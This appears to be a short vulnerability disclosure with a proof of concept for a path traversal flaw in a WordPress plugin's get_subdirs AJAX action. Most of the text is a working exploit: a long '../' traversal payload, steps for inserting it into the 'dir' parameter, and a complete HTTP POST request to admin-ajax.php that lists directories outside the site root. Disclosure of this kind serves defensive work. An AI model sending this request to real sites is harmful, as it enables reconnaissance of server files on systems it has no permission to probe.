The plugin does not sanitize the dir parameter when handling the get_subdirs ajax action, allowing a high privileged users such as admins to inspect names of files and directories outside of the sites root.
- Payload: ../../../../../../../../../../../../../../../../../../../
- At the "Other directory" function, select a directory -> At param "dir" add payload: ../../../../../../../../../../ ../ ../../../../../../../../../../..
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Referer: http://localhost/wordpress/wp-admin/admin.php?page=iowd_settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 102
Cookie: [Admiin+]
action=get_subdirs&nonce_iowd=xxxxxxxxxx&dir=../../../../../../../../../../../../../../../../../../../